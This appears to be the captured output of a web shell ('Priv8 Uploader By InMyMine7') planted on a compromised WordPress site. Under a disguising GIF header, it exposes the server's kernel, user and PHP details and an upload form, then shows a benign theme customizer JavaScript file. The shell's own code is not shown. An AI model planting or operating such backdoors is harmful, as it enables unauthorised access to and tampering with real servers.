GIF89a;
Notice: Undefined index: in /home/bs3263/domains/poolq.ee/public_html/wp-content/plugins/classic-editor/classic-editor.php on line 3

Priv8 Uploader By InMyMine7

Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
HEX
HEX
Server: Apache/2
System: Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
User: bs3263 (524)
PHP: 7.3.5
Disabled: NONE
Upload Files
File: /home/bs3263/public_html/wp-content/themes/grow/admin/main/assets/js/thinkup-customizer.js
(function( $ ) {

	$(document).ready(function (){

		// Only needed on customizer page - theme options page handled using Redux core customization
		if( jQuery( 'body' ).hasClass( 'wp-customizer' ) ) {

			// ----------------------------------------------------------------------------------------------------------
			// 1. CUSTOMIZER PAGE
			// ----------------------------------------------------------------------------------------------------------

			// Add active class to customizer
			$('body.wp-customizer #accordion-panel-thinkup_customizer_section_themeoptions > h3').click(function(e){

				var target_control       = '#customize-controls';
				var target_preview       = '#customize-preview';
				var target_preview_width = $( '#customize-preview' ).width();

				// Remove width classes
				// $( target_control ).removeClass( 'thinkup-width-450' );
				// $( target_preview ).removeClass( 'thinkup-width-450' );
				// $( target_preview ).css( 'width', '' );

				// Remove width classes
				// $( target_control ).addClass( 'thinkup-width-450' );
				// $( target_preview ).addClass( 'thinkup-width-450' );
				// $( target_preview ).css( 'width', ( target_preview_width - 150 ) );
			});

			// Remove width classes
			$( 'body.wp-customizer [id*="panel-thinkup_customizer_section_themeoptions"] .accordion-section > button' ).click(function(e){

				var target_control = '#customize-controls';
				var target_preview = '#customize-preview';
				var target_preview_width = $( '#customize-preview' ).width();

				// $( target_control ).removeClass( 'thinkup-width-450' );
				// $( target_preview ).removeClass( 'thinkup-width-450' );
				// $( target_preview ).css( 'width', '' );
			});
		}

	});
})( jQuery );